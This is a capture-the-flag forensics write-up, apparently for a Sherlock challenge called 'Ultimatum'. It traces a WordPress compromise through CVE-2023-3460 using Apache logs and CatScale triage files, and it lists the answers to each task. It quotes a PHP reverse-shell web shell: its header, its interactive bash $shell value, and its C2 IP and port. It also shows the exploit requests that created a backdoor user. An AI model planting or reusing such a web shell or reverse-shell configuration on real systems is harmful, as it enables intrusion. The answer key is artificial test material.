ultimatum

Released2024-05-16
Retired2024-11-07
AuthorCyberJunkie
ctf sherlock easy linux catscale apache2

Scenario

One of the Forela WordPress servers was a target of notorious Threat Actors (TA). The website was running a blog dedicated to the Forela Social Club, where Forela employees can chat and discuss random topics. Unfortunately, it became a target of a threat group. The SOC team believe this was due to the blog running a vulnerable plugin. The IT admin already followed the acquisition playbook and triaged the server for the security team. Ultimately (no pun intended) it is your responsibility to investigate the incident. Step in and confirm the culprits behind the attack and restore this important service within the Forela environment.

Task 01

Question: Which security scanning tool was utilized by the attacker to fingerprint the blog website?

Part of the CatScale collection are the Apache2 access logs located in the folder Logs\var\log\apache2\access.log. The scan is included in these requests, so the tool used can be identified by the User Agent present in these logs:

23.106.60.163 - - [08/Aug/2023:08:21:27 +0000] "GET / HTTP/1.1" 200 11596 "http://3.110.136.25/" "WPScan v3.8.24 (https://wpscan.com/wordpress-security-scanner)"

Answer: wpscan/3.8.24

Task 02

Question: Which CVE was exploited by the attacker?

Based on results from other tasks, a conclusion can be drawn about the vulnerable plugin (Ultimate Member) as well as the backdoor user (deployed via a public PoC). This also allows the identification of the related CVE.

Answer: CVE-2023-3460

Task 03

Question: What was the IP Address utilized by the attacker to exploit the CVE?

After successfully identifying the scan and the subsequent exploitation of the vulnerable plugin, the exploitation of CVE-2023-3460 can be clearly attributed to the same IP, thanks to the access.log used in Task 1.

23.106.60.163 - - [08/Aug/2023:08:33:59 +0000] "GET //index.php/register/ HTTP/1.1" 301 295 "-" "Secragon Offensive Agent"
23.106.60.163 - - [08/Aug/2023:08:33:59 +0000] "GET /index.php/register/ HTTP/1.1" 200 11367 "-" "Secragon Offensive Agent"
23.106.60.163 - - [08/Aug/2023:08:33:59 +0000] "POST //index.php/register/ HTTP/1.1" 302 951 "-" "Secragon Offensive Agent"
23.106.60.163 - - [08/Aug/2023:08:34:00 +0000] "GET /index.php/user/secragon/ HTTP/1.1" 200 14335 "-" "Secragon Offensive Agent"

Answer: 23.106.60.163

Task 04

Question: What is the name of the backdoor user added to the blog as part of the exploitation process?

By examining the publicly known exploit identified in Task 02 and correlating it with the access.log, the user installed as a backdoor can be clearly attributed.

23.106.60.163 - - [08/Aug/2023:08:34:00 +0000] "GET /index.php/user/secragon/ HTTP/1.1" 200 14335 "-" "Secragon Offensive Agent"

Answer: secragon

Task 05

Question: After the exploit, the SOC team observed that the attacker’s IP address changed and from the logs, it seems that the attacker manually explored the website after logging in. The SOC team believes that the previous IP seen during exploitation was a public cloud IP. What is the IP Address the attacker used after logging in to the site?

Immediately after the creation of the new user, accesses from a different IP are observed. These and subsequent accesses in the access.log indicate malicious behavior (e.g., accessing the placed web shell) and are therefore also attributed to the attacker.

198.16.74.45 - - [08/Aug/2023:08:58:20 +0000] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5Bchunk_0%5D=dashicons,admin-bar,site-health,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-poi&load%5Bchunk_1%5D=nter,widgets,site-icon,l10n,buttons,wp-auth-check&ver=6.2.2 HTTP/1.1" 200 81088 "http://3.110.136.25/wp-admin/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0"

Answer: 198.16.74.45

Task 06

Question: The SOC team has suspicions that the attacker added a web shell for persistent access. Confirm the full path of the web shell on the server.

Catscale automatically detects files with the extensions jsp, asp, aspx, and php to facilitate the search for web shells. The first 1000 lines of each of these files are saved in Misc\ip-172-31-11-131-20230808-0937-pot-webshell-first-1000.txt.

==> /var/www/html/wp-content/themes/twentytwentythree/patterns/hidden-comments.php <==
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 [email protected]

Answer: /var/www/html/wp-content/themes/twentytwentythree/patterns/hidden-comments.php

Task 07

Question: What was the value of the $shell variable in the web shell?

Part of the web shell found in Task 06 also includes the variable in question. Its content can be determined thanks to the previously mentioned file.

[...]
$error_a = null;
$shell = 'uname -a; w; id; /bin/bash -i';
$daemon = 0;
[...]

Answer: 'uname -a; w; id; /bin/bash -i';

Task 08

Question: What is the size of the webshell in bytes?

To determine the size of the identified file, another summary file generated by Catscale is helpful: In ip-172-31-11-131-20230808-0937-full-timeline.csv, the entire recorded behavior is captured in a timeline in CSV format. This includes the creation of the web shell and its size.

Inode,Hard link Count,Full Path,Last Access,Last Modification,Last Status Change,File Creation,User,Group,File Permissions,File Size(bytes)
[...]
267656,1,/var/www/html/wp-content/themes/twentytwentythree/patterns/hidden-comments.php,2023-08-08 08:58:02.856871375 +0000,2023-08-08 08:58:02.816872892 +0000,2023-08-08 08:58:02.816872892 +0000,-,www-data,www-data,-rw-r--r--,2592

Answer: 2592

Task 09

Question: The SOC team believes that the attacker utilized the webshell to get RCE on the server. Can you confirm the C2 IP and Port?

The configuration for the C2 server is also located in the hidden-comments.php file (starting at line 656381).

$VERSION = "1.0";
$ip = '43.204.24.76';
$port = 6969;

Answer: 43.204.24.76:6969

Task 10

Question: What is the process ID of the process which enabled the Threat Actor (TA) to gain hands-on access to the server?

Thanks to the IP and port for the C2 server identified in Task 09, the associated process can also be identified in the active network connections, aided by the summary file ip-172-31-11-131-20230808-0937-ss-anepo.txt from Catscale in line 202.

tcp  ESTAB  0  0  172.31.11.131:60380  43.204.24.76:6969  users:(("bash",pid=234521,fd=12),("sh",pid=234517,fd=12),("apache2",pid=234471,fd=12)) uid:33 ino:1532880 sk:b <->

Answer: 234521

Task 11

Question: What is the name of the script/tool utilized as part of internal enumeration and finding privilege escalation paths on the server?

Catscale outputs a collection of all executable files in ip-172-31-11-131-20230808-0937-exec-perm-files.txt. One of these files (line: 868) stands out because it is located in the /tmp/ directory and has a well-known filename for a recon script.

26bbf01183c7aacf331f9ecdf694d44122e1a089  /tmp/systemd-private-d9287ecaa4c343bfbd0341e9b66e0697-apache2.service-x0W7Fg/tmp/LinEnum.sh

A comparison with the checksum of the publicly available file shows that this is exactly this script in its unmodified form.

Get-FileHash .\LinEnum.sh -Algorithm sha1 | Select-Object Hash                  
Hash
----
26BBF01183C7AACF331F9ECDF694D44122E1A089

Answer: LinEnum.sh